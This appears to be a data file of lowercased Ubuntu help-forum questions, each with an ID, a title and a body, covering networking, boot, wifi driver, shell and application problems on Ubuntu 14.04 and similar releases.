522536	can ping & http but not smtp from a host	i have an ubuntu 14 server host . i can ping and http to an external server , but can not smtp to it . doing host mail.domain.com returns the correct external address , so dns is working . doing ping mail.domain.com shows me that we successfully reach the server . doing telnet mail.domain.com 80 shows me i get the expected 400 error . doing a curl also shows the expected data . but , doing a telnet mail.domain.com 25 gives me a telnet : unable to connect to remote host : connection refused . doing a traceroute mail.domain.com shows that i presumably go a few hops outside of the ubuntu server , across some comcast nodes , but then fail out ? 1 < hidden > 2 < hidden > 3 < hidden > 4 pos-3-15-0-0-cr01.56marietta.ga.ibone.comcast.net ( 68.86.91.221 ) 17.061 ms pos-0-6-0-0-cr01.miami.fl.ibone.comcast.net ( 68.86.95.57 ) 11.345 ms pos-3-15-0-0-cr01.56marietta.ga.ibone.comcast.net ( 68.86.91.221 ) 17.052 ms 5 he-0-11-0-1-pe04.56marietta.ga.ibone.comcast.net ( 68.86.89.94 ) 15.382 ms 15.381 ms be-15-pe02.nota.fl.ibone.comcast.net ( 68.86.83.146 ) 8.659 ms 6 65.124.97.177 ( 65.124.97.177 ) 50.463 ms 49.446 ms 49.418 ms 7 * * * 8 63.148.218.166 ( 63.148.218.166 ) 85.529 ms 75.366 ms 75.155 ms 9 216.197.122.66 ( 216.197.122.66 ) 83.499 ms 77.650 ms 77.689 ms 10 * * * 11 * * * from another ( windows 7 ) box on the local network , that telnet command works fine , with the expected 220 smtp message . 1 < hidden > 2 < hidden > 3 < hidden > 4 10 ms 11 ms 19 ms pos-3-15-0-0-cr01.56marietta.ga.ibone.comcast.net [ 68.86.91.221 ] 5 8 ms 8 ms 8 ms be-12-pe02.nota.fl.ibone.comcast.net [ 68.86.82.121 ] 6 48 ms 48 ms 53 ms nap-edge-04.inet.qwest.net [ 65.122.166.77 ] 7 * * * request timed out . 8 75 ms 73 ms 75 ms 63.148.218.166 9 75 ms 75 ms 75 ms 216.197.122.66 10 75 ms 70 ms 70 ms 216.119.120.174 11 76 ms 76 ms 76 ms mail.domain.com steps 1-3 show the same data . any suggestions ? why would packets from one box get routed differently than another coming from the same network ?
522538	why does n't windows 8 appear in the `` bios '' boot selection after ubuntu is installed ?	so , i 've installed ubuntu alongside windows 8 . everything is fine except when i am in the bios i only see the ubuntu partition . i see the windows partition in ubuntu , but just not in the bios . what am i doing wrong , so i can be able to boot into both windows and ubuntu ? here 's a picture of the volume in nautilus : and here 's a screenshot showing gparted ( click for larger image ) :
522539	ca n't run script with proz on ubuntu	i am trying to compile ios code on ubuntu . trying to set up all tools according to : https : //code.google.com/p/ios-toolchain-based-on-clang-for-linux/wiki/howto_en i get stuck on the point : ./cctools-ld64.sh in line 27 of the script it complains that proz command is unknown . i tried to install prozilla , but required packages are unavailable for ubuntu . another problem is , that it complains , that the wanted file is unavailable : ld64_url=http : //www.opensource.apple.com/tarballs/ld64/ $ ld64_file ld64_file=ld64-236.3.tar.gz do you have an idea , or should i forget ios on ubuntu ?
522542	how can i mount drives whilst booting	i have used 32-bit kubuntu and am trying out 64-bit ubuntu 14.04 ( unity ) . by default ubuntu when booting only mounts the partition on which it resides . i have several others , in cluding one which ubuntu calls `` 37 gb volume '' , alias /dev/sdb5 , on which kubuntu and some data files reside . on the other systems on my computer , namely windows xp and kubuntu 12.04 , all visible partitions are mounted on booting , and i believe i could achieve this by adding some code to a boot file ; but i do n't know the code and i do n't know which file . a related problem which xp can handle is to get the numlock to come on while booting so that the number characters in my password are read properly . trivial problems , one may say , but i like to believe that anything windows can do , ubuntu can do better !
522546	setting up juniper vpn on 14.04	i saw this post , but unfortunately continue to have issues as seen here : does anyone have suggestions for fixing this issue ? thanks !
522550	can not find location of permanent aliases .	a couple of months ago , i made a few permanent aliases for my bash shell on ubuntu 14.04 . they are actively making my life easier , and i would like to add a couple more to the list , but i can not find them . my .bashrc file does not actually contain any aliases , just the lines about running ~/.bash_aliases if it exists . and my ~/.bash_aliases file is completely blank .
522552	no wireless networks shown on ubuntu 10.10	i am trying connect to a wireless network on ubuntu 10.10 installed on a hp desktop . no wireless networks are shown in the top right . here is what i get when i compile some commands *-network disabled description : wireless interface product : rt3099 802.11n 1t/1r pcie vendor : ralink physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : 70 : f1 : xx : xx : xx : xx width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=2.6.35-22-generic firmware=n/a latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : fbff0000-fbffffff output of rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no can any one tell me what is wrong with this . i had enabled wireless setting at the top right .
522553	ubuntu on rmbp , bootloader location	i 'm getting ready to do a fresh install of ubuntu 14.04 on my macbook pro . my setup is as follows : mac osx and windows-bootcamp on the internal ssd ubuntu 13.04 on an external ssd hooked up through thunderbolt currently i use refind on a thumb drive to load ubuntu . i 'd like to take that out of the equation , but i do n't want to install refind on my mac 's internal drive . i know there has to be a way do make this work . i have an ubuntu liveusb ( made with unetbootin ) that works without refind and loads the same way i would boot into bootcamp . i 'm just not sure where i should install the bootloader ( efi partition , right at the root of the drive , or on my system root partition ) .
522554	facing wifi related problem afer installing ubuntu alongside windows	after installing ubuntu 13.10 alongside windows 8.1 i can not use ubuntu 's wifi . should i install a driver or something ? i have a dell inspiron 3421 laptop .
522555	installation of ubuntu after install wont boot at all	i had windows 7 completely removed when i installed ubuntu 14.04 which is what i wanted . what i do n't understand is that the installation worked fine , but when i restart the computer ubuntu does not boot . the bios boot sequence is correct . i saw the memory check and after the hard drive update but ubuntu does not help . is this a partition problem even though it is a clean install of ubuntu ?
522556	ca n't reattach to screen	i 've been having problems with screen ( the terminal command ) . if i type screen -ls it gives me : no sockets found in /var/run/screen/s-root . for screen -r i get : there is no screen to be resumed . what i did was to put @ reboot screen -d -m /path/to/script in crontab , my shell script starts a java process . my htop shows both the java and the screen command pid . any ideas ? thanks in advance . p.s . : i use ubuntu 14.04.1 lts
522557	`` date and time settings '' gui in ubuntu 14.04 is not working ?	i have been trying to access the date and time setting in my ubuntu 14.04 to modify the time ( which is wrong ) . i click in the hour in the top-right corner of the top bar , and then in `` date & time settings ... '' 1 . instead it takes me to `` system settings '' 2 . if i tried to click on `` time & date '' in `` system settings '' , it just closes the `` system settings '' screen . if i start the gnome-control-center from the command line i get the following : ( unity-control-center:4000 ) : glib-gio-error ** : settings schema 'com.canonical.indicator.datetime ' does not contain a key named 'show-year ' trace/breakpoint trap i went to sudo dconf-editor and check in com > canonical > indicator > datetime . i can confirm that show-year does n't exist . i am not sure if i can simply add a new variable there and if it is so , how ? thanks ! 1 date and time settings 2 system settings
522562	how to find ip address lease info using wpa2 enterprise	i 'm trying to find the dhcp lease info for my wifi connection on a network using wpa2 enterprise and peap . i can do this in windows using ipconfig /all which shows both when the lease was issued and when the lease expires . looking in /var/lib/dhcp i can not find any recent entries . all of them appear to be for other wifi networks . also my /var/lib/dhcp/dhclient.leases file is empty . so i 'm wondering if the information is kept somewhere else in the case of peap connections , but have been unable to find any info about this after a few google searches .
522563	apt-get upgrade does n't work	i tried to install some package called ibimobiledevice2 to resolve ios devices bug in linux but the package could not get installed because some dependencies problem . it suggested to do apt-get -f install but when i do this i get some held packages problem ... avatar @ avatar-dell : / $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libimobiledevice2 : depends : libusbmuxd2 ( > = 1.0.0 ) but it is not installable e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies avatar @ avatar-dell : / $ i tried to google this but could not find an answer . could anybody explain how to fix this held packages problem ? thank you . nick .
522564	i am running ubuntu 14.04 lts on a sony vaio and i can no longer detect wireless networks , how do i fix this ?	i have a sony vaio , bought in 2013 so it 's a fairly new model . i installed ubuntu 14.04 lts and i can not connect to wifi- or even detect any wifi . i 've tried to install drivers and even tried a wireless adapter , nothing seems to work.. please help thanks
522566	files from déjà dup can not be restored . ( could not restore the following files . please make sure you are able to write to them . )	i have a fresh installation on my old ssd-drive . now i 'd like to restore my data from a déjà dup backup , but i receive the error message : could not restore the following files . please make sure you are able to write to them . the files are : /home/username/.local/share/zeitgeist/fts.index/termlist.db /home/username/.mozilla/firefox/plph1fls.default/adblockplus/patterns-backup1.ini /home/username/.mozilla/firefox/plph1fls.default/adblockplus/patterns-backup2.ini /home/username/.mozilla/firefox/plph1fls.default/adblockplus/patterns-backup3.ini /home/username/.mozilla/firefox/plph1fls.default/adblockplus/patterns-backup4.ini /home/username/.mozilla/firefox/plph1fls.default/adblockplus/patterns-backup5.ini /home/username/.mozilla/firefox/plph1fls.default/adblockplus/patterns.ini /home/username/.mozilla/firefox/plph1fls.default/blocklist.xml /home/username/.mozilla/firefox/plph1fls.default/prefs.js /home/username/.thunderbird/l7vyhpos.default/imapmail/email.server.tld/junk /home/username/.thunderbird/l7vyhpos.default/imapmail/email.server.tld/junk e-mail /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/inbox /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/inbox.sbd/1_newsletter.sbd/website.tld /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/inbox.sbd/1_newsletter.sbd/website.tld.msf /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/inbox.sbd/1_communities.sbd/xing.msf /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/inbox.sbd/1_communities.sbd/facebook.msf /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/inbox.sbd/1_communities.sbd/facebook.sbd/updates.msf /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/inbox.sbd/1_mailinglists.sbd/students /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/junk /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/junk.msf /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/sent-1 /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host.tld/sent-1.msf /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host2.tld/junk /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.host2.tld/junk.msf /home/username/.thunderbird/l7vyhpos.default/imapmail/imap.gmx.net/junk-1.msf /home/username/.thunderbird/l7vyhpos.default/junklog.html /home/username/.thunderbird/l7vyhpos.default/prefs.js /home/username/.thunderbird/l7vyhpos.default/session.json /home/username/.thunderbird/l7vyhpos.default/sessioncheckpoints.json /home/username/.thunderbird/l7vyhpos.default/training.dat how can i solve the problem ? i already tried to restore an older version . i also extracted into a folder with write permissions for everyone .
522567	trying to standby drive at startup	i have 3 drives in my laptop , one of which is a mechanical hard drive for mass storage . i want to set this drive to standby because i want to preserve energy and keep my laptop silent at startup . command to do this : hdparm -y /dev/sdb things i 've tried : add the command to startup applications http : //i.imgur.com/xt4ou39.png add the command to a script added aformentioned script + the command ( both as sudo and non-sudo ) in the /etc/rc.local http : //i.imgur.com/awsxks7.png but the drive is still spinning when i start ubuntu . can anyone help ? system information : it 's a toshiba mechanical drive ubuntu 14.04 laptop computer
522569	wazone 2100 cutscenes	i 'm new to ubuntu 14.04lts , i ran ubuntu a few years back and hove now returned and its all oh so different ! ! anyway my problem is i have installed warzone 2100 from the software manager and would like to add the cutscenes , which i have downloaded , however i cant for the life of me work out how to do it , falling at the first hurdle of not being able to work out where it has default installed ( software manager didnt give me any options ) . please excuse my ignorance and treat me as a total newbie , i cant remember much of what i 'd learnt before . thanks for your help in advance
522570	how to slipstream ubuntu the easy way ?	there are a few dead projects that could do this : ubuntu-builder remastersys too compilcated customizer ubuntu customization kit the question before i go to bed : how to slipstream ubuntu the easy way ? meaning a gui tweaks/features autostart in livecd mode full support of windows filesystems if possible support of mac os x hfs+ filesystems ( not needed , but nice to have ) recovery/backup tools slipstreamed . gparted , with support of all filesystems related to windows , as that is what needs the most fixing extremely lite ! wine , for anti malware tools . this will be used in a testcd , which i will use , if i want to backup windows machines . and if also possible wine , to scan the windows drives for virusses with mbam superantispyware . already tested them . they work fine .
522573	acer aspire wifi on broadcom b43 not working	lspci -v 00:00.0 host bridge : intel corporation mobile 945gse express memory controller hub ( rev 03 ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation mobile 945gse express integrated graphics controller ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , fast devsel , latency 0 , irq 16 memory at 58280000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at 60f0 [ size=8 ] memory at 40000000 ( 32-bit , prefetchable ) [ size=256m ] memory at 58300000 ( 32-bit , non-prefetchable ) [ size=256k ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , fast devsel , latency 0 memory at 58200000 ( 32-bit , non-prefetchable ) [ size=512k ] capabilities : < access denied > 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , fast devsel , latency 0 , irq 45 memory at 58340000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00005000-00005fff memory behind bridge : 57100000-581fffff prefetchable memory behind bridge : 0000000050000000-0000000050ffffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : 56100000-570fffff prefetchable memory behind bridge : 0000000051000000-0000000051ffffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 00002000-00003fff memory behind bridge : 55000000-560fffff prefetchable memory behind bridge : 0000000052000000-0000000052ffffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 02 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 00001000-00001fff memory behind bridge : 54000000-54ffffff prefetchable memory behind bridge : 0000000053000000-0000000053ffffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) ( prog-if 00 [ uhci ] ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , medium devsel , latency 0 , irq 16 i/o ports at 60a0 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) ( prog-if 00 [ uhci ] ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , medium devsel , latency 0 , irq 17 i/o ports at 6080 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) ( prog-if 00 [ uhci ] ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at 6060 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) ( prog-if 00 [ uhci ] ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , medium devsel , latency 0 , irq 19 i/o ports at 6040 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) ( prog-if 20 [ ehci ] ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , medium devsel , latency 0 , irq 16 memory at 58344400 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=32 capabilities : < access denied > 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , 66mhz , medium devsel , latency 0 , irq 44 i/o ports at 60d8 [ size=8 ] i/o ports at 60fc [ size=4 ] i/o ports at 60d0 [ size=8 ] i/o ports at 60f8 [ size=4 ] i/o ports at 6020 [ size=16 ] memory at 58344000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) subsystem : acer incorporated [ ali ] device 022f flags : medium devsel , irq 11 i/o ports at 6000 [ size=32 ] 01:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) subsystem : foxconn international , inc. t77h106.00 wireless half-size mini pcie card physical slot : 1 flags : bus master , fast devsel , latency 0 , irq 16 memory at 57100000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : b43-pci-bridge 03:00.0 ethernet controller : qualcomm atheros ar8132 fast ethernet ( rev c0 ) subsystem : acer incorporated [ ali ] device 022f flags : bus master , fast devsel , latency 0 , irq 46 memory at 55000000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at 2000 [ size=128 ] capabilities : < access denied > kernel driver in use : atl1c
522578	installed eclipse gives error with command `` eclipse & ''	i installed the latest release of eclipse from the eclipse download site . i installed it in the /opt/ directory . after that i created soft link via the command : sudo ln -s /opt/eclipse/eclipse /usr/local/bin/eclipse but when i do `` eclipse & '' to launch the application , it pops up with an error message : the eclipse executable launcher was unable to locate its companion launcher jar . what is this problem , how to open eclipse with the command eclipse & ? thank you ! ! !
522581	booting after installation not working	i installed ubuntu 14.04 on my dell inspiron 1525 alongside windows 7.whenever i try booting ubuntu , a screen flashes showing three errors . b43-phy0 error : can not found `` b43/ucode15.fw '' b43-phy0 error : can not found `` b43-open/ucode15.fw '' then it starts booting.but its written drive for /tmp is not ready or not present . and below it shows press s to skip mounting or m for manual recovery . i tried all that is given on the site for these error messages once ubuntu has booted int the manual recovery mode but that does n't work.the booting goes on and does n't complete . please help .
522582	google chrome account broken	i have been experiencing this problem ever since i re installed ubuntu 14.04 i can not force google sync account to work properly i get this error every time i start chrome first i thought it was fault of `` passwords and keys '' ( i am talking about the password , you set after you install chrome ) well i disabled it and no go it still would give me that error . then i 've tried to re install chrome multiple times , even tried to install beta version , still no go . while installing and re installing chrome i 've signed in and signed out multiple times from google chrome but nothing helps . i even deleted chrome 's folder from ubuntu file nothing seems to work , does anyone knows what to do in a situation like this ? ? thank you in advance ls -al .config/ | grep chrom shows this : drwx -- -- -- 7 levan levan 4096 სექ 11 03:52 google-chrome her is ( ls -al .config/google-chrome/ ) output ls -al .config/google-chrome/ total 7508 drwx -- -- -- 7 levan levan 4096 სექ 11 04:00 . drwx -- -- -- 27 levan levan 4096 სექ 11 03:15 .. -rw-r -- -- - 1 levan levan 213973 სექ 11 03:50 certificate revocation lists -rw -- -- -- - 1 levan levan 6 სექ 11 03:15 channels drwx -- -- -- 2 levan levan 4096 სექ 11 03:15 crash reports drwx -- -- -- 12 levan levan 4096 სექ 11 03:24 default drwx -- -- -- 2 levan levan 4096 სექ 11 03:16 dictionaries -rw-r -- -- - 1 levan levan 0 სექ 11 03:15 first run -rw -- -- -- - 1 levan levan 49236 სექ 11 04:00 local state drwx -- -- -- 3 levan levan 4096 სექ 11 03:35 pnacl drwx -- -- -- 16 levan levan 4096 სექ 11 03:56 profile 1 -rw-rw-r -- 1 levan levan 5163740 სექ 11 03:33 safe browsing bloom -rw-rw-r -- 1 levan levan 1009218 სექ 11 03:33 safe browsing bloom prefix set -rw-r -- r -- 1 levan levan 6144 სექ 11 03:33 safe browsing cookies -rw-r -- r -- 1 levan levan 4640 სექ 11 03:33 safe browsing cookies-journal -rw-rw-r -- 1 levan levan 113284 სექ 11 03:33 safe browsing csd whitelist -rw-rw-r -- 1 levan levan 1016684 სექ 11 03:33 safe browsing download -rw-rw-r -- 1 levan levan 14532 სექ 11 03:33 safe browsing download whitelist -rw-rw-r -- 1 levan levan 36664 სექ 11 03:33 safe browsing extension blacklist -rw-rw-r -- 1 levan levan 696 სექ 11 03:33 safe browsing ip blacklist lrwxrwxrwx 1 levan levan 20 სექ 11 03:29 singletoncookie - > 15826594184631451903 lrwxrwxrwx 1 levan levan 12 სექ 11 03:29 singletonlock - > genesis-3672 lrwxrwxrwx 1 levan levan 46 სექ 11 03:29 singletonsocket - > /tmp/.com.google.chrome.gbpfam/singletonsocket
522585	audio jumbled on youtube and rhythmbox on ubuntu 14.04	i have no idea why but my audio is messed up when i listen to music or watch videos . it sort of pops or clips of the audio move around . it 's hard to explain and even more annoying . i 've already tried disabling automute in the mixer . i 'm using a skullcandy headset on a digital output s/pdif .
522586	installation issue from the internet	i am having problem in getting the os installed fron internet . it is very slow please advise alterative . with regards anil
522593	bluetooth not working for hp dv 7 6b32 us	i am using ubuntu 14.04 with gnome . i dual booted it with windows 7 . when i try to launch the bluetooth application , i get a message in the launched app `` no bluetooth adapters found '' . the app thus does not give me any options of launching bluetooth . any help would be highly appreciated .
522597	newbie to ubuntu today w/windows 7-64 bit dual boot system	i just downloaded and installed ubuntu on hd side-by-side w/windows7 64-bit , transitioning to ubuntu & rid of windows eventually . i know zip about ubuntu , but all seems fine except for my wifi access . currently using belkin wireless dual-band-600n usb adapter in usb 3.0 port . opened terminal and did a lsusb it shows : bus 008 device 002 : id 050d:110a belkin component from there , i am totally lost ... . ? network menu only shows lan ethernet card which i 'm not using ... do n't know how to config wifi in ubuntu . james ... update : i opened terminal , typed in uname -r and the terminal replied with : 3.13.0-32-generic it does not look right as installed ubuntu-64 from iso-dvd according to instructions . my system is : 64-bit amd apu-a8-3870 quad-processor , 8gb ddr3 , windows 7-64 bit i have not been able to update anything sine the install as i have no internet in ubuntu , i only have internet in windows 7 . i tried to install wine ... it wont install , and i tried to install cube64.zip it wont install it hangs at step # 3 in tutorial ... . it 's been 3 days working on this w/out help , hopefully someone knows something ... ?
522598	does ubuntu 14.04 support the ati radeon 9200 graphics card ?	i 've been doing some reading and it seems that users who have the same ati radeon 9200 graphics card are experiencing trouble with the driver . i think i remember reading somewhere that ubuntu automatically downloads the open source driver for you if your driver is no longer supported by the original company . which this card is not , it 's really old , but it still runs pretty well . i am switching over from linux mint cinnamon in hopes that the driver issue is solved . i could only get it to run in fall-back mode on this card . so i 'm hoping a new os will solve the problem . i 'm new to linux and i just do n't want to fiddle with the drivers right after a fresh install .
522599	how to get color man pages under fish shell ?	there seems to be a way to get man pages to display in color ( see here . it involves setting environment variables associated with less and adding these definitions to .bashrc . i tried doing the same in config.fish for the fish shell , but got no color output . how to get color man pages in the fish shell ?
522605	keystrokes out of order	i am running a fairly recent lubuntu and often when there is a task in the background or something else that takes a lot of cpu cycles , i get keystrokes out of order when i type in a window that is in the process of initialization . for example , in the browser ( chrome ) when it is still redrawing its ui . has anyone seen this ? $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04.1 lts release : 14.04 codename : trusty
522606	ubuntu 14.04 wired connection connecting and disconnecting on its own	i installed ubuntu 14.04 last month . the internet was working fine . but all of a sudden , a few days back it stopped working . the connection is established temporarily and then disconnecting again . this happening in seconds . the ifconfig output below : eth0 link encap : ethernet hwaddr 18:03:73:56 : e2 : b2 inet addr:172.16.51.51 bcast:172.16.51.63 mask:255.255.255.192 inet6 addr : fe80 : :1a03:73ff : fe56 : e2b2/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:67 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:10875 ( 10.8 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:323 errors:0 dropped:0 overruns:0 frame:0 tx packets:323 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:23989 ( 23.9 kb ) tx bytes:23989 ( 23.9 kb )
522608	dconf-editor i ca n't make any chage in 'com '	wana chage the login screen on ubuntu 14.04 . so i open the `` dconf-editor '' . in dconf-editor the 'com ' ca n't opening .
522609	how long should it take to load from liveusb	i 'm trying to install ubuntu 14.04 from a usb and it 's been booting from the usb for at least an hour now . i always installed from a dvd before and i remember it takes a really long time ( at least it did last time ) , but this seems even longer than i remember . how long before i decide something 's wrong and i need to try something else ? what else should i try ? i 'm on a lenovo thinkpad t440p , one of the few machines listed as ubuntu-certified hardware
522610	how to recover boot startup after dual booting ?	i have a big problem . really big problem . i ca n't open my operating system anymore . if i opened my laptop it will display the logo of my laptop then there will be a prompt like this : secure boot image failed to verify with *access denied* . press any key to continue after clicking ok it says operating system not found it is my problem . i already tried to change the boot hierarchy into ubuntu then next windows but same effects . what i can do is to boot from usb . in the usb i can boot ubuntu . but i have n't tried with windows because i do n't have windows os iso file yet . in the boot of ubuntu . the options are only install and demo . in the demo i can access my drive in the windows . can i use the boot repair under demo of ubuntu to fix my boot load ? i already tried easy recovery essentials for windows 8.1 but i ca n't boot into it . please help me guys with this . i ca n't sleep all day thingking how can i resolve this . my last option will be installation of new os . that 's all guys i hope you can help me . by the way i am downloading the boot repair in ubuntu now and i will boot it in usb . and hopefully it will work . and lastly my laptop has a pre-installed windows 8.1
522612	how well does ubuntu 14 work on a vaio laptop or should i stick with 12.10	i was wondering how well 14.04 works with vaios or laptops for that matter ? it took along time of tinkering with 12.10 to get all of the features that came with the laptop oem so losing all that hard work would seem a waste . but dont get me wrong i love a good problem solving challenge .
522614	ubuntu 14.04 : removing `` shoppingaddon '' adware	i currently use firefox on ubuntu 14.04 . unfortunately , i am constantly plagued by pop-ups by shoppingaddon . furthermore , random text displayed on a web-page will occasionally have a link that leads to some commercial website trying to sell me something . my question is : how do i go about removing all of this unnecessary adware from the system ?
522617	install stalls at `` configuring bcmwl-kernel-source ( i386 ) '' on an old pentium m system	install stalls at `` configuring bcmwl-kernel-source ( i386 ) . i tried 3 times fails at place . i am loading ubuntu on an old winxp pro system . the system is a dell inspiron 2200 . it has a pentium m processor and i had to use the `` forcepae '' command .
522619	qmlscene from launcher icon	i 'm currently developing an application just for myself on ubuntu desktop using ubuntu sdk . i 've been trying to make an executable on the desktop/launcher to start the application from the desktop . i 've created an icon that can be run as an executable and on the command under properties- > command on the launcher i 've put : qmlscene ~/file/path/main.qml when entered into the terminal this same way , the application starts how i would like it to . but when launched from the desktop icon , only qmlscene pops up that i then have to manually follow the path to main.qml does anyone know how to correctly launch an application from the launcher icon ?
522622	any alternative to xterm with splitting and tabs ?	xterm is great because i can view images inside it in w3m or ranger . however , as a terminal it does not support tabs or splitting . is there an alternative that works like xterm but supports splitting and tabs ?
522624	preview .html file from remote aws ec2 instance on local machine 's browser	from this and this i 've gathered that i should ssh into my ec2 instance from my mac by : ssh -c -c blowfish -x -i user.pem user @ hostname.com this accomplishes x11 forwarding . afterwards , how do i preview an /path/to/index.html file in chrome or any web browser ?
522626	help me with installing modem driver software	i am having huawei ec 150 data card . it works well with the default network programs in ubuntu . my network provider offers 3g speed upto 1gb for two days there after the speed will drops as per the plan . the problem is that the default program in ubuntu works for 3g speed . when i cross the 1gb data limit i cant able to access the network not signal is being detected . so i have to install driver software for the device . i tried so many ways and installed finally . however the software does n't detect the network . so kindly provide me the details how should i configure my device . xxx @ xxx : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 003 : id 12d1:140b huawei technologies co. , ltd. ec1260 wireless data modem hsd usb card bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 003 : id 046d : c05a logitech , inc. m90/m100 optical mouse bus 002 device 002 : id 046d : c31d logitech , inc. media keyboard k200 bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub if any other set of details needed kindly comment .
